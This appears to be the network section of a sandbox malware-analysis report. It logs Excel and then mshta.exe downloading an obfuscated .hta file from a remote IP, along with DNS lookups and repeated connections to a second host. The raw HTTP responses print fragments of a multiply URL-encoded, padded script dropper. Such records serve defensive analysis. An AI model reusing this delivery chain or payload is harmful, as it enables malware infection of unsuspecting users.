                                                                    Nov 20, 2024 07:58:05.170720100 CET4923880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.175673962 CET804923894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.888010025 CET804923894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.888117075 CET804923894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.888261080 CET4923880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.888427019 CET4923880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.893320084 CET804923894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:06.029975891 CET4923980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:06.035279989 CET804923994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:06.035362959 CET4923980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:06.037022114 CET4923980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:06.041963100 CET804923994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:06.042036057 CET4923980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:06.047008038 CET804923994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:06.878705025 CET804923994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:06.878837109 CET4923980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:06.878928900 CET804923994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:06.878984928 CET4923980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:06.884042978 CET804923994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:07.020375967 CET4924080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:07.025450945 CET804924094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:07.025538921 CET4924080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:07.027129889 CET4924080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:07.032279015 CET804924094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:07.032370090 CET4924080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:07.037302017 CET804924094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:07.903635025 CET804924094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:07.903692007 CET804924094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:07.903784990 CET4924080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:07.903820992 CET4924080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:07.913734913 CET804924094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:08.053921938 CET4924180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:08.059031963 CET804924194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:08.059108973 CET4924180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:08.073318958 CET4924180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:08.079600096 CET804924194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:08.079653025 CET4924180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:08.084486008 CET804924194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:08.914391994 CET804924194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:08.914417982 CET804924194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:08.914515018 CET4924180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:08.914552927 CET4924180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:08.919532061 CET804924194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.063486099 CET4924280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.069010973 CET804924294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.069102049 CET4924280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.070729971 CET4924280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.075655937 CET804924294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.075720072 CET4924280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.080656052 CET804924294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.790751934 CET804924294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.790944099 CET4924280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.791009903 CET804924294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.791059017 CET4924280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.795871019 CET804924294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.939985037 CET4924380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.946429968 CET804924394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.946500063 CET4924380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.948055029 CET4924380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.961137056 CET804924394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.961206913 CET4924380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.967533112 CET804924394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:10.690216064 CET804924394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:10.690342903 CET4924380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:10.690473080 CET804924394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:10.690649033 CET4924380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:10.695527077 CET804924394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:10.829443932 CET4924480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:10.834743023 CET804924494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:10.834861994 CET4924480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:10.836560011 CET4924480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:10.842076063 CET804924494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:10.842150927 CET4924480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:10.846997976 CET804924494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:11.686970949 CET804924494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:11.687159061 CET804924494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:11.687263966 CET4924480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:11.687264919 CET4924480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:11.692159891 CET804924494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:11.836878061 CET4924580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:11.841885090 CET804924594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:11.841970921 CET4924580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:11.843614101 CET4924580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:11.848469019 CET804924594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:11.848536968 CET4924580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:11.853900909 CET804924594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:12.561392069 CET804924594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:12.561451912 CET804924594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:12.561532974 CET4924580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:12.561532974 CET4924580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:12.566541910 CET804924594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:12.716434002 CET4924680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:12.721364021 CET804924694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:12.721434116 CET4924680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:12.733412027 CET4924680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:12.738281012 CET804924694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:12.738338947 CET4924680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:12.743275881 CET804924694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:13.441821098 CET804924694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:13.441886902 CET804924694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:13.441956043 CET4924680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:13.441956043 CET4924680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:13.446885109 CET804924694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:13.581747055 CET4924780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:13.588251114 CET804924794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:13.588423014 CET4924780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:13.590063095 CET4924780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:13.595061064 CET804924794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:13.595288038 CET4924780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:13.600413084 CET804924794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:14.312865973 CET804924794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:14.313093901 CET804924794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:14.313214064 CET4924780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:14.313215017 CET4924780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:14.318123102 CET804924794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:14.436793089 CET4924880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:14.442003012 CET804924894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:14.442079067 CET4924880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:14.443617105 CET4924880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:14.448815107 CET804924894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:14.448889017 CET4924880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:14.454035044 CET804924894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:15.160309076 CET804924894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:15.160454035 CET4924880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:15.160870075 CET804924894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:15.160943985 CET4924880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:15.165410995 CET804924894.156.177.41192.168.2.22
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 20, 2024 07:56:31.405399084 CET5456253192.168.2.228.8.8.8
                                                                    Nov 20, 2024 07:56:31.415816069 CET53545628.8.8.8192.168.2.22
                                                                    Nov 20, 2024 07:56:34.360862017 CET5291753192.168.2.228.8.8.8
                                                                    Nov 20, 2024 07:56:34.384808064 CET53529178.8.8.8192.168.2.22
                                                                    Nov 20, 2024 07:57:08.725164890 CET6275153192.168.2.228.8.8.8
                                                                    Nov 20, 2024 07:57:08.743362904 CET53627518.8.8.8192.168.2.22
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Nov 20, 2024 07:56:31.405399084 CET192.168.2.228.8.8.80xa150Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                    Nov 20, 2024 07:56:34.360862017 CET192.168.2.228.8.8.80x4ba6Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                    Nov 20, 2024 07:57:08.725164890 CET192.168.2.228.8.8.80xcc3eStandard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Nov 20, 2024 07:56:31.415816069 CET8.8.8.8192.168.2.220xa150No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                    Nov 20, 2024 07:56:34.384808064 CET8.8.8.8192.168.2.220x4ba6No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                    Nov 20, 2024 07:57:08.743362904 CET8.8.8.8192.168.2.220xcc3eNo error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                    • provit.uk
                                                                    • 192.3.243.136
                                                                    • 94.156.177.41
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.2249164192.3.243.136803192C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:56:32.373878956 CET397OUTGET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1
                                                                    Accept: */*
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: 192.3.243.136
                                                                    Connection: Keep-Alive
                                                                    Nov 20, 2024 07:56:32.962903976 CET1236INHTTP/1.1 200 OK
                                                                    Date: Wed, 20 Nov 2024 06:56:32 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                    Last-Modified: Wed, 20 Nov 2024 01:22:20 GMT
                                                                    ETag: "2c850-6274dfb369376"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 182352
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/hta
                                                                    Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 32 25 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 25 32 35 32 35 32 31 2d 2d 25 32 35 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 35 32 38 25 32 35 32 35 32 32 25 32 35 32 35 32 35 33 43 25 32 35 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 32 35 33 45 25 32 35 32 35 32 35 30 41 25 32 35 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 35 32 30 68 74 74 70 [TRUNCATED]
                                                                    Data Ascii: <script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CscRipt%25252520Type%2525253D%25252522TexT/vbsCRipT%25252522%2525253E%2525250ADim%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
                                                                    Nov 20, 2024 07:56:32.962941885 CET1236INData Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25
                                                                    Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
                                                                    Nov 20, 2024 07:56:32.962970972 CET448INData Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32
                                                                    Data Ascii: 252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
                                                                    Nov 20, 2024 07:56:32.962980032 CET1236INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32
                                                                    Data Ascii: 25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%
                                                                    Nov 20, 2024 07:56:32.963009119 CET1236INData Raw: 47 4b 6d 64 67 41 67 49 4f 76 64 63 6d 7a 4a 59 7a 56 6d 66 56 41 64 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35
                                                                    Data Ascii: GKmdgAgIOvdcmzJYzVmfVAd%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252
                                                                    Nov 20, 2024 07:56:32.963027954 CET1236INData Raw: 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30
                                                                    Data Ascii: 09%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252525
                                                                    Nov 20, 2024 07:56:32.963042021 CET1236INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32
                                                                    Data Ascii: 25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%
                                                                    Nov 20, 2024 07:56:32.963061094 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35
                                                                    Data Ascii: 52509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252
                                                                    Nov 20, 2024 07:56:32.963073015 CET1236INData Raw: 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30
                                                                    Data Ascii: 09%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252525
                                                                    Nov 20, 2024 07:56:32.963093996 CET1236INData Raw: 54 74 45 4c 6a 4c 62 69 53 63 6e 67 70 59 59 51 58 61 69 46 52 54 70 72 77 56 51 62 4e 59 51 4e 48 72 59 51 72 63 4d 61 73 74 56 77 43 44 69 70 76 5a 67 5a 4a 6c 44 49 69 49 4e 48 50 73 70 7a 59 52 62 65 69 43 69 5a 4c 72 52 68 55 66 4f 4b 25 32
                                                                    Data Ascii: TtELjLbiScngpYYQXaiFRTprwVQbNYQNHrYQrcMastVwCDipvZgZJlDIiINHPspzYRbeiCiZLrRhUfOK%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%
                                                                    Nov 20, 2024 07:56:32.968157053 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35
                                                                    Data Ascii: 52509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.2249166192.3.243.136803492C:\Windows\System32\mshta.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:56:35.301343918 CET474OUTGET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Language: en-US
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Range: bytes=8896-
                                                                    Connection: Keep-Alive
                                                                    Host: 192.3.243.136
                                                                    If-Range: "2c850-6274dfb369376"
                                                                    Nov 20, 2024 07:56:35.879904032 CET1236INHTTP/1.1 206 Partial Content
                                                                    Date: Wed, 20 Nov 2024 06:56:35 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                    Last-Modified: Wed, 20 Nov 2024 01:22:20 GMT
                                                                    ETag: "2c850-6274dfb369376"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 173456
                                                                    Content-Range: bytes 8896-182351/182352
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/hta
                                                                    Data Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 [TRUNCATED]
                                                                    Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252
                                                                    Nov 20, 2024 07:56:35.880037069 CET224INData Raw: 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35
                                                                    Data Ascii: 52509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509UxtkIthyqsLFIkGMWINdfZtDNUyfSGrGiuuLxalrwPaTBJYqmFsWvkrThHzpCOpBeCZLaGGzXovaaDqkVITrwBkNhQyTpZqAgKQnlzzyoFFcajQUtGXodngK
                                                                    Nov 20, 2024 07:56:35.880048990 CET1236INData Raw: 68 6c 62 55 61 43 44 63 47 48 44 73 61 55 5a 4f 51 41 6c 63 76 4e 45 57 63 6e 6e 50 6d 49 6e 6e 44 46 54 74 45 4c 6a 4c 62 69 53 63 6e 67 70 59 59 51 58 61 69 46 52 54 70 72 77 56 51 62 4e 59 51 4e 48 72 59 51 72 63 4d 61 73 74 56 77 43 44 69 70
                                                                    Data Ascii: hlbUaCDcGHDsaUZOQAlcvNEWcnnPmInnDFTtELjLbiScngpYYQXaiFRTprwVQbNYQNHrYQrcMastVwCDipvZgZJlDIiINHPspzYRbeiCiZLrRhUfOK%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
                                                                    Nov 20, 2024 07:56:35.880072117 CET1236INData Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35
                                                                    Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252
                                                                    Nov 20, 2024 07:56:35.880084038 CET1236INData Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25
                                                                    Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
